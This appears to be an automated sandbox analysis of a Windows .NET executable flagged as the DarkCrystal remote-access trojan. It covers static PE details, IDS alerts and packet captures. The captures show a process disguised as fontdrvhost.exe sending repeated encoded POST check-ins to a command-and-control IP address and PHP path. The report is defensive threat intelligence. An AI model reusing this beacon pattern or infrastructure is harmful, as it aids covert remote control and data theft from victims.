                                                                  SSDEEP:98304:ce0NRfHctOXBignPFAfL7B71KHijptuNMsZ:c1lckBiKPJCVt4Z
                                                                  TLSH:1406E10696714E73C1A47F72C4E7082D92E09B667623EF1B371F50D9A8232718B571FA
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.......... 8.. ...@8...@.. ........................8...........@................................

                                                                  File Icon

                                                                  Icon Hash:90cececece8e8eb0

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x7820fe
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3820b00x4b.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3840000x370.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3860000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x3801040x3802000fbf4c3f1828842ffbf90db81458e910unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x3840000x3700x400decdc6cf86f7b728495e0907c027ea84False0.3759765625data2.8622309503628585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .reloc0x3860000xc0x200951104bb5b7192bb5a0993d168e100caFalse0.041015625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "8"0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0x3840580x318data0.44823232323232326

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  03/29/24-07:38:03.072563TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4974580192.168.2.489.23.98.225
                                                                  03/29/24-07:37:10.589011TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4973180192.168.2.489.23.98.225
                                                                  03/29/24-07:37:41.258721TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4974280192.168.2.489.23.98.225
                                                                  03/29/24-07:37:01.421586TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4973080192.168.2.489.23.98.225
                                                                  03/29/24-07:37:37.301200TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4974180192.168.2.489.23.98.225
                                                                  03/29/24-07:38:15.792609TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4974680192.168.2.489.23.98.225
                                                                  03/29/24-07:37:55.065041TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4974480192.168.2.489.23.98.225
                                                                  03/29/24-07:37:32.317096TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4974080192.168.2.489.23.98.225
                                                                  03/29/24-07:38:55.054545TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4974980192.168.2.489.23.98.225
                                                                  03/29/24-07:37:19.143924TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4973880192.168.2.489.23.98.225

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 29, 2024 07:37:01.181196928 CET4973080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:01.420476913 CET804973089.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:01.420562983 CET4973080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:01.421586037 CET4973080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:01.659907103 CET804973089.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:01.659979105 CET804973089.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:01.671164989 CET4973080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:01.909681082 CET804973089.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:02.000096083 CET4973080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:10.348623991 CET4973180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:10.588505030 CET804973189.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:10.588593960 CET4973180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:10.589010954 CET4973180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:10.828591108 CET804973189.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:10.828888893 CET804973189.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:10.831746101 CET4973180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:11.070168972 CET804973189.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:11.161180973 CET4973180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:18.900304079 CET4973880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:19.143124104 CET804973889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:19.143219948 CET4973880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:19.143923998 CET4973880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:19.387130976 CET804973889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:19.387149096 CET804973889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:19.392754078 CET4973880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:19.635179996 CET804973889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:19.815875053 CET4973880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:23.363398075 CET4973980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:23.608145952 CET804973989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:23.608234882 CET4973980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:23.608653069 CET4973980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:23.850985050 CET804973989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:23.851135015 CET804973989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:23.853965998 CET4973980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:24.064965010 CET4973980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:24.096179962 CET804973989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:24.096328020 CET4973980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:32.073822975 CET4974080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:32.315167904 CET804974089.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:32.316679955 CET4974080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:32.317095995 CET4974080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:32.560663939 CET804974089.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:32.560790062 CET804974089.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:32.563004017 CET4974080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:32.804204941 CET804974089.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:32.813020945 CET4974080192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:37.058106899 CET4974180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:37.300735950 CET804974189.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:37.300823927 CET4974180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:37.301199913 CET4974180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:37.543860912 CET804974189.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:37.543878078 CET804974189.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:37.554234982 CET4974180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:37.797171116 CET804974189.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:38.165261984 CET4974180192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:41.016069889 CET4974280192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:41.254925966 CET804974289.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:41.258431911 CET4974280192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:41.258721113 CET4974280192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:41.497473001 CET804974289.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:41.497651100 CET804974289.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:41.499818087 CET4974280192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:41.738126040 CET804974289.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:41.938113928 CET4974280192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:54.820020914 CET4974480192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:55.064439058 CET804974489.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:55.064515114 CET4974480192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:55.065041065 CET4974480192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:55.308389902 CET804974489.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:55.308947086 CET804974489.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:55.312774897 CET4974480192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:37:55.555813074 CET804974489.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:37:55.609735012 CET4974480192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:02.835516930 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:03.072112083 CET804974589.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:03.072240114 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:03.072562933 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:03.308924913 CET804974589.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:03.309076071 CET804974589.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:03.311923981 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:03.548557997 CET804974589.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:03.753887892 CET4974580192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:15.506139040 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:15.763705969 CET804974689.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:15.763787985 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:15.792608976 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:16.050101042 CET804974689.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:16.050306082 CET804974689.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:16.139678001 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:16.254513025 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:16.511805058 CET804974689.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:18.553652048 CET4974680192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.120861053 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.363040924 CET804974789.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:30.363173008 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.363462925 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.605492115 CET804974789.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:30.605541945 CET804974789.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:30.607585907 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.786469936 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:30.849894047 CET804974789.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:30.849967003 CET4974780192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.189112902 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.429017067 CET804974889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:43.429090977 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.429280996 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.666357994 CET804974889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:43.666553020 CET804974889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:43.669164896 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.728008986 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:43.908014059 CET804974889.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:43.908094883 CET4974880192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:54.818653107 CET4974980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:55.054209948 CET804974989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:55.054311991 CET4974980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:55.054544926 CET4974980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:55.289860010 CET804974989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:55.290139914 CET804974989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:55.293150902 CET4974980192.168.2.489.23.98.225
                                                                  Mar 29, 2024 07:38:55.528521061 CET804974989.23.98.225192.168.2.4
                                                                  Mar 29, 2024 07:38:55.538605928 CET4974980192.168.2.489.23.98.225

                                                                  HTTP Request Dependency Graph

                                                                  • 89.23.98.225

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.44973089.23.98.225805496C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:37:01.421586037 CET381OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:01.659979105 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:01 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:01.671164989 CET344OUTData Raw: 00 05 04 0d 06 0f 01 02 05 06 02 01 02 03 01 06 00 01 05 0b 02 06 03 0b 00 03 0f 51 07 01 01 53 0c 56 03 00 01 00 05 01 0d 00 04 01 04 00 04 01 05 00 0b 0b 0a 06 05 04 06 55 07 05 07 05 05 0f 02 56 0e 08 05 0e 05 05 0d 07 0e 05 0e 0d 0d 08 05 51
                                                                  Data Ascii: QSVUVQQU\L}QcyZwLuBvex~ljY`Upk]Q_xR^^xsbK|}cPtdlje~V@{m~L}\}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.44973189.23.98.225807376C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:37:10.589010954 CET398OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:10.828888893 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:10 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:37:10.831746101 CET344OUTData Raw: 00 0b 04 00 03 0f 01 03 05 06 02 01 02 02 01 00 00 00 05 0f 02 07 03 08 01 06 0f 06 03 01 01 54 0a 00 05 0a 07 05 05 0a 0d 0a 04 0b 04 0b 05 04 07 02 0e 01 0c 00 04 57 06 0e 04 0c 04 04 07 58 05 05 0c 08 06 0e 05 08 0f 03 0c 50 0d 00 0b 07 04 0c
                                                                  Data Ascii: TWXPR\L~~`qZc\[bflhb]v|`hMpJ{RgH{j|Thwd`~O~V@xCz}Lq


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.44973889.23.98.225807736C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 07:37:19.143923998 CET380OUTPOST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:37:19.387149096 CET696INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:37:19 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
